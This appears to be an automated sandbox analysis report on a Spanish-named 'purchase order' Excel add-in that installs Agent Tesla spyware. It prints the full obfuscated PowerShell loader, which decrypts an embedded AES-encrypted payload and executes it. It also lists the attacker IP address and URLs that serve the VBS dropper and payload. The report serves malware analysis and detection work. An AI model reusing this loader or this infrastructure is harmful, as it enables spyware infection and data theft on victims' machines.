File name: | Orden de compra.xlam |
Full analysis: | https://app.any.run/tasks/15c07060-2d6d-4d98-9e37-d61de5b7cd66 |
Verdict: | Malicious activity |
Threats: | Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold. |
Analysis date: | July 25, 2024, 19:49:58 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.spreadsheetml.sheet |
File info: | Microsoft Excel 2007+ |
MD5: | 4590B84EFCAC4A9804D570F575246E27 |
SHA1: | 82C7EBAA6F3D4E09C2BF6C2414E3664B90BB0E35 |
SHA256: | 5C40CEEF86F84DAFD5702A066833B86C7A0067B20C8DADDFF80FF5E1018BA033 |
SSDEEP: | 24576:ROhpoPmytX56Nlk+YYdnND39BLC0oHW+uv/kTFYGMhwvFLpKrIlN:kpoPmytX5Mk+YYdnND39BLC0oHW+uv/k |
.xlsx | | | Excel Microsoft Office Open XML Format document (61.2) |
---|---|---|
.zip | | | Open Packaging Conventions container (31.5) |
.zip | | | ZIP compressed archive (7.2) |
AppVersion: | 16.03 |
---|---|
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
Company: | - |
TitlesOfParts: | Sheet1 |
HeadingPairs: |
|
ScaleCrop: | No |
DocSecurity: | None |
Application: | Microsoft Excel |
ModifyDate: | 2023:08:03 11:37:28Z |
CreateDate: | 2023:08:03 11:34:29Z |
LastModifiedBy: | USER |
Creator: | USER |
---|
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1341 |
ZipCompressedSize: | 395 |
ZipCRC: | 0x0356e658 |
ZipModifyDate: | 2024:07:25 16:21:16 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0002 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3856 | "C:\Windows\System32\taskmgr.exe" | C:\Windows\System32\taskmgr.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Task Manager Exit code: 1073807364 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3088 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
2496 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | svchost.exe | ||||||||||||
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 Modules
| |||||||||||||||
3512 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\herewgoagain..vbs" | C:\Windows\System32\wscript.exe | — | EQNEDT32.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 1 Version: 5.8.7600.16385 Modules
| |||||||||||||||
3540 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87033969203593984906393361840877CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnItDVfHzjTfNv7NHCZik3Du+9coR1FCmrHXH+Jjcg1QMvDCxEjHIV0kExEkV8UsWGyNxenYzZjkOwD4n5fkr1MLOQsoZE3GSH5j8lwTHd3NGG/Qd4VC9X5LjNYMDwENpm83Rs107dhDciePWSZ3h2kRFXD66mlAPNaxsgdTjos892SSfE+hX/RF7AGEKiCee1nzMKBpITFuh6fmuq6J7Nno4vBWienzjFeTjQKEucPEGdha9yYQa1NXwEsbYs1smiZBT01RbopMHSkOo1r1MUWLiCn1W42cFBaDukZKUs3/Fjdv9PISaWEdcvCSd8xx0weKY/6pc5wuFjQCAwe7Gu26juXgEdTd77O0i/u9AMwBDfj5PAocdI2Miw2RNgwHAsNjB4nijKk1Z+zWBSlGRNasCONCcABUdGvRa6xggUvGxRDtfWUy/a4TjozlLiI0cJ0vHYyq9p2dN+OlDFSrymB+1kNye/umYbl+4hWrlWTXIAPW49OktkAPpHwlIU5ihQMEJvGj8OrsEQ5EzNnjkusuQmMS0dSdXnwpZA1M/2aERpF76yNgJNx0ZH7NdFfc7QOa+rU0/9ie2zLf7XrTuqJAT5FsUPDgickumkmgfCl0SwGFzsaknbTy/0KTnt72wDrRwAUC+Bntx7Kj+PmRNezbnlMVsVIBq8xkhMCPIQqCZFsljefjVsEuLMLHbqCT/7X/G9MoWw21znqJlFh3SyluMI5swlqjacVr86YPKSaGvKmzaR4UcoV1+/8v9k36YlfzyLRzJFSYdbXzcFF4mf6EKH4FQA5j4Bb+c/IxiaUxXUot8STnKpnvCy9smdWg5/IrPO2UmI1LR7FQBcU+n0Svn8b7+LmIo5c1/7YMlxbkreLwPNzvXz2UAtxhMGbppZ6kg5szkmvZ3FzJJHh9EYyp3z5P1r/N6MuMgPVQHc2DsS8FzrNORkG/2TMgkQ5GNvMzkUTyXwgFCPkVpH9A+v2MLca8d4Q9IQes/TC9VfFb5j4YBKe+Fl+9cANlHiKL2OyW4p24X47Ym48XeQaJ0hKMHY416MKcqZVKkMFkel9V/Uj+2asXyB/mxpqqO8RyTNqAPHdj50SLvHjX85gAvdsv2S3gWKbiB+7KgZ4Of4EbO2MhKSKpl4e5h45KK0broLnKF6LeDfT1tPKOcTp7LirtikUY6x9b9pDxVjqkpml4YcwoXGGZzPbFnRVdT9HVxSEhyyh9ZR6gclI6kVCpPvBXzeEpXPxvfaLZ/0yDUMb+wSnAEiW2oZYJgSQXQX54SwVLcvqU+AM+wGayCOQQKYGokMCVRXLqLO0yTNIlJ9yttfNs6JtoeP134ga42TuRrz85Rb3vZJZTG7pO4cjJ1hRF1XaogAOgAwSvk7YCMPB5PNVlduX4qH0tOy2RyW+lahypGBn0k+d9WxFz0I8OJyQCzckyZpxLyqPiN9KsrpQ/6JNQ4HHd45JqasgXc+iE5vxiS0ZhKONRzL1maVcEsksIStiUgTWZkbNhpkvwvDkWoqayEbgyXsFXCimruMYcLwijsZNEfqnRpeyvQCXNQ7tI1ppqz8zD2DVlkrYMq964gqvCkVmjkyoRohSnYMXAwbbezPMAlBLKBW2Vvp5J+CB/+9sCHYrFNBDbWc1Fa4JEkpb1l+I5icGuF9lzRPh4Wmd8OOro3SvKcqxH3LwAjs42jGcczEhJjVavUx7cRmWvDwLjSlzx26nN+t7ZXaIgFKRstFxgCYpEnZRBo8Ceji6E6rBgqjt9XKw9mnSo6eV7ImgxCM1gXyTvYhEWMJ3XQ8JSvSwyoK2Ui3UVhSMM/GKPw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
2276 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: AddInProcess.exe Exit code: 1073807364 Version: 4.8.3761.0 built by: NET48REL1 Modules
| |||||||||||||||
1388 | C:\Windows\System32\ctfmon.exe | C:\Windows\System32\ctfmon.exe | — | taskeng.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CTF Loader Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
1524 | C:\Windows\system32\sipnotify.exe -LogonOrUnlock | C:\Windows\System32\sipnotify.exe | taskeng.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: sipnotify Exit code: 0 Version: 6.1.7602.20480 (win7sp1_ldr_escrow.191010-1716) Modules
| |||||||||||||||
2060 | "C:\Program Files\Common Files\microsoft shared\IME14\SHARED\IMEKLMG.EXE" /SetPreload /JPN /Log | C:\Program Files\Common Files\microsoft shared\IME14\SHARED\IMEKLMG.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Office IME 2010 Exit code: 1 Version: 14.0.4734.1000 Modules
| |||||||||||||||
2068 | "C:\Program Files\Common Files\microsoft shared\IME14\SHARED\IMEKLMG.EXE" /SetPreload /KOR /Log | C:\Program Files\Common Files\microsoft shared\IME14\SHARED\IMEKLMG.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Office IME 2010 Exit code: 1 Version: 14.0.4734.1000 Modules
|
(PID) Process: | (3088) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Operation: | write | Name: | jh1 |
Value: 6A683100100C0000010000000000000000000000 | |||
(PID) Process: | (3088) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (3088) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1041 |
Value: Off | |||
(PID) Process: | (3088) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1046 |
Value: Off | |||
(PID) Process: | (3088) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1036 |
Value: Off | |||
(PID) Process: | (3088) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1031 |
Value: Off | |||
(PID) Process: | (3088) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1040 |
Value: Off | |||
(PID) Process: | (3088) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1049 |
Value: Off | |||
(PID) Process: | (3088) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 3082 |
Value: Off | |||
(PID) Process: | (3088) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1042 |
Value: Off |
PID | Process | Filename | Type | |
---|---|---|---|---|
3088 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRC04A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3088 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Orden de compra.xlam.LNK | binary | |
MD5:563BDF6CC7DF90471E8C9FA6D671CB8E | SHA256:B73CD8FFE649F0F01EAF4354E6A38C0180F476F413552C3AC867EDC9726C0DCB | |||
2496 | EQNEDT32.EXE | C:\Users\admin\AppData\Roaming\herewgoagain..vbs | text | |
MD5:C930F9919D538D29300810720CAA8B3F | SHA256:09D786230948EBF09ABB8461040A94387AE3F8F4639F86C33DE1F602089897E1 | |||
1524 | sipnotify.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\main.jpg | image | |
MD5:B342ACE63F77961249A084C61EABC884 | SHA256:E5067BBA2095B5DA7C3171EC116E9A92337E24E471339B0860A160076EFE49B9 | |||
3540 | powershell.exe | C:\Users\admin\AppData\Local\Temp\yus0vk3d.ofl.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
1524 | sipnotify.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\en-us.html | html | |
MD5:9752942B57692148B9F614CF4C119A36 | SHA256:E31B834DD53FA6815F396FC09C726636ABF98F3367F0CF1590EF5EB3801C75D1 | |||
2496 | EQNEDT32.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\herewgoagain[1].vbs | text | |
MD5:C930F9919D538D29300810720CAA8B3F | SHA256:09D786230948EBF09ABB8461040A94387AE3F8F4639F86C33DE1F602089897E1 | |||
1524 | sipnotify.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\metadata.json | binary | |
MD5:E8A970BA6CE386EED9A5E724F26212A6 | SHA256:7E06107D585D8FC7870998F3856DCC3E35800AA97E4406AAB83BC8444B6CBDE3 | |||
3088 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | ini | |
MD5:61AB622B6636924580C8CDC7E5F85788 | SHA256:194FB3ADF800C024EBD627850D9FEC545E2C68B6CA5F6C632BF526AEC668C3EB | |||
3540 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | dbf | |
MD5:446DD1CF97EABA21CF14D03AEBC79F27 | SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1372 | svchost.exe | GET | 304 | 23.36.76.104:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?33775f6043c93e33 | unknown | — | — | unknown |
1372 | svchost.exe | GET | 200 | 23.36.76.146:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | unknown |
1372 | svchost.exe | GET | 200 | 96.6.16.217:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | unknown |
1060 | svchost.exe | GET | 304 | 23.36.76.104:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?8f69642324cc87bd | unknown | — | — | unknown |
2276 | AddInProcess32.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/line/?fields=hosting | unknown | — | — | unknown |
2496 | EQNEDT32.EXE | GET | 200 | 107.175.229.144:80 | http://107.175.229.144/herewgoagain.vbs | unknown | — | — | unknown |
3540 | powershell.exe | GET | 200 | 107.175.229.144:80 | http://107.175.229.144/mybase64rdpdpdpd.txt | unknown | — | — | unknown |
1524 | sipnotify.exe | HEAD | 200 | 104.110.23.132:80 | http://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE2JgkA?v=133664144014210000 | unknown | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 224.0.0.252:5355 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1372 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
1060 | svchost.exe | 224.0.0.252:5355 | — | — | — | whitelisted |
2496 | EQNEDT32.EXE | 107.175.229.144:80 | — | AS-COLOCROSSING | US | unknown |
1372 | svchost.exe | 23.36.76.104:80 | ctldl.windowsupdate.com | Akamai International B.V. | NO | unknown |
1372 | svchost.exe | 23.36.76.146:80 | crl.microsoft.com | Akamai International B.V. | NO | unknown |
1372 | svchost.exe | 96.6.16.217:80 | www.microsoft.com | AKAMAI-AS | NO | unknown |
3540 | powershell.exe | 207.241.232.195:443 | ia803405.us.archive.org | INTERNET-ARCHIVE | US | unknown |
Domain | IP | Reputation |
---|---|---|
google.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
ctldl.windowsupdate.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
ia803405.us.archive.org |
| unknown |
ip-api.com |
| shared |
ftp.horeca-bucuresti.ro |
| malicious |
query.prod.cms.rt.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
2496 | EQNEDT32.EXE | Potentially Bad Traffic | ET INFO Dotted Quad Host VBS Request |
3540 | powershell.exe | Exploit Kit Activity Detected | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 |
1060 | svchost.exe | Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Check (ip-api .com) |
1060 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com) |
2276 | AddInProcess32.exe | Device Retrieving External IP Address Detected | POLICY [ANY.RUN] External Hosting Lookup by ip-api |
2276 | AddInProcess32.exe | Device Retrieving External IP Address Detected | ET POLICY External IP Lookup ip-api.com |
3540 | powershell.exe | Potentially Bad Traffic | PAYLOAD [ANY.RUN] Reverse Base64 Encoded EXE Inbound |